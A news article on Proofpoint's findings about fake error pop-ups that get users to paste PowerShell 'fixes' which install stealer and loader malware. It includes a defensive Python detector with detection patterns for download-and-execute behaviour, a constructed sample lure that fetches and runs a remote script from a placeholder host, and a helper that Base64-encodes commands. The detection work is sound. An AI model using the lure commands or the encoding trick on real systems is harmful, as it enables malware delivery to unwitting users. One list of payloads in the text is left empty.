That PowerShell ‘solution’ to your root cert ‘problem’ is a malware loader in disguise

Crafty criminals are targeting thousands of organizations around the world with social engineering attacks that use fake error messages to trick users into running malicious PowerShell scripts.

This latest Windows malware distribution campaign uses fake Google Chrome, Microsoft Word, and OneDrive error messages to resemble real alerts. After visiting a legitimate but compromised website, victims will see some sort of pop-up text box in their browser informing them that something went wrong. It’s an old but extremely effective trick. One that is worth knowing, we think, so that you can help prevent colleagues and others from falling for it.

Marks are then instructed to click a “fix” button and then paste the displayed code into a PowerShell terminal or Windows Run dialog box. This allows PowerShell to run another remote script that downloads and runs the malware on the victim’s PC.

Proofpoint malware hunters have spotted at least two criminal gangs using this technique to infect people’s machines. At least one of the gangs is most likely using it to spread ransomware, we’re told.

“While the attack chain requires significant user interaction to be successful, the social engineering is smart enough to present someone with what appears to be a real problem and a real solution at the same time, which can prompt a user to take action without regard to the risk,” say Tommy Madjar, Dusty Miller and Selena Larson in a report out this week.

Proofpoint says it spotted a crew called TA571 using this specific PowerShell-powered technique as early as March 1, and that the gang behind the ClearFake malware campaign has been using it since early April. Both were still active in early June, and a third campaign called ClearFix has also been testing it since May.

In these attacks, users visit a compromised website that loads a malicious script “hosted on the blockchain via Binance’s Smart Chain contracts,” according to the report – a technique apparently called EtherHiding – which then loads a fake warning window in the browser in which the victim is asked to install a “root certificate” to solve a fictitious problem.

The message contains instructions to copy a PowerShell script and then manually run it on the machine. This script flushes the DNS cache, clears the clipboard contents, displays a decoy message to the user, and then downloads and runs a remote PowerShell script.

This remote script runs a series of Windows Management Instrumentation checks and then drops the Lumma Stealer malware, which downloads three payloads:

In some cases, the Amadey malware downloads others, including a Go-based malware that threat hunters say they believe is the nasty JaskaGo software, which can be configured for both Windows and macOS machines.

“This means that a total of five different malware families can be executed by running just one initial PowerShell script,” they wrote.

Click-no-fix

The ClearFix campaign used a similar strategy: the attackers used a compromised website with an injection that led to an iframe overlay. This appears as a Google Chrome error message that likewise tells users to open “Windows PowerShell (Admin)” and then paste the sneaky code, which ultimately leads to the Vidar Stealer being downloaded and run.

The third campaign, which Proofpoint attributed to TA571, a team known for mass spamming its targets, sent more than 100,000 phishing emails to thousands of organizations around the world.

In this version, criminals send emails with a malicious HTML attachment disguised as a Microsoft Word page. It displays an error message warning that the ‘Word Online extension is not installed’, and then gives two options: ‘How to fix’ and ‘Automatically fix’.

Clicking “How to fix this” copies a Base64 encoded PowerShell command to the computer’s clipboard with a message instructing the user to open PowerShell and right-click the console.
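The two ingredients the article describes so far, a pasted script that flushes DNS, wipes the clipboard, shows a decoy and then downloads and executes a remote script, and a Base64-encoded variant handed over via the clipboard, are the kind of thing a defender can score in PowerShell script-block logging (Event ID 4104) or process command lines. The following is an added example written for this page, not code from Proofpoint or The Register: it unwraps `-EncodedCommand` arguments (Base64 of UTF-16LE text) and flags the combination of behaviours the report lists. The indicator names, the scoring threshold, the `example.invalid` URL and the sample script-block text are all constructed here for illustration.

```python
"""Score PowerShell script-block text for the 'paste this fix' lure pattern.

Input is the text a defender already has: the ScriptBlockText field of
Event ID 4104 records, or a process command line. Encoded commands are
decoded first so that the indicators are matched against the real payload.
"""
import base64
import re
from typing import Optional

# Indicator labels are chosen for this example; the cmdlet and alias names
# (Clear-DnsClientCache, Set-Clipboard, iwr, iex, ...) are real PowerShell ones.
INDICATORS = [
    ("dns_flush", re.compile(r"Clear-DnsClientCache|ipconfig\s+/flushdns", re.I)),
    ("clipboard_wipe", re.compile(r"Set-Clipboard(\s+-Value)?\s*(''|\"\"|\$null)", re.I)),
    ("decoy_message", re.compile(r"Write-Host|\[System\.Windows\.Forms\.MessageBox\]::Show", re.I)),
    ("remote_download", re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|Invoke-RestMethod|\birm\b", re.I)),
    ("exec_of_download", re.compile(r"\biex\b|Invoke-Expression", re.I)),
]

# powershell.exe accepts -e, -ec, -enc and -EncodedCommand, all case-insensitive.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_script(text: str) -> dict:
    """Match every indicator against the text plus any decoded payload.

    The download-and-execute pair is the core of the lure; it is flagged as
    suspicious only when at least one of the supporting behaviours (DNS flush,
    clipboard wipe, decoy message) is present as well, to limit noise from
    ordinary admin scripts that fetch something with iwr/iex.
    """
    payload = decode_encoded_command(text)
    effective = text + ("\n" + payload if payload else "")
    hits = [name for name, rx in INDICATORS if rx.search(effective)]
    core = {"remote_download", "exec_of_download"} <= set(hits)
    return {"hits": hits, "encoded": payload is not None, "suspicious": core and len(hits) >= 3}


def build_encoded_sample(script: str) -> str:
    """Wrap a script the way -EncodedCommand expects it (Base64 of UTF-16LE)."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -NoProfile -EncodedCommand {b64}"


# Constructed sample script-block text modelled on the behaviours in the
# report; not a real captured sample. The URL is a placeholder.
SAMPLE_LURE = """ipconfig /flushdns
Set-Clipboard -Value ''
Write-Host 'Installing root certificate, please wait...'
iex (iwr -UseBasicParsing 'http://example.invalid/fix.ps1')
"""

# Constructed benign admin one-liner for comparison.
SAMPLE_BENIGN = "Get-ChildItem C:\\Users -Recurse | Where-Object Length -gt 1MB\n"


if __name__ == "__main__":
    for label, sample in [("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN),
                          ("encoded lure", build_encoded_sample(SAMPLE_LURE))]:
        print(label, score_script(sample))
```

Run against an export of 4104 events, the useful output is the `hits` list rather than the boolean: a clipboard wipe immediately after a DNS flush in a script a user ran by hand is itself worth a look, even when the download stage used a method the regexes do not cover.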

Meanwhile, the “Auto-fix” button uses the search-ms protocol to display a WebDAV-hosted “fix.msi” or “fix.vbs” file.

When the MSI file is executed, Matanbuchus, another malware loader, is installed, while the VBS file downloads and executes the DarkGate attack code.

“Proofpoint has high confidence that TA571 infections can lead to ransomware,” the researchers said, noting that this team is constantly adapting its email decoys and attack chains.

The security shop also provides examples of indicators of compromise and recommends that organizations train employees to detect and report suspicious activity, especially these types of social engineering attacks. ®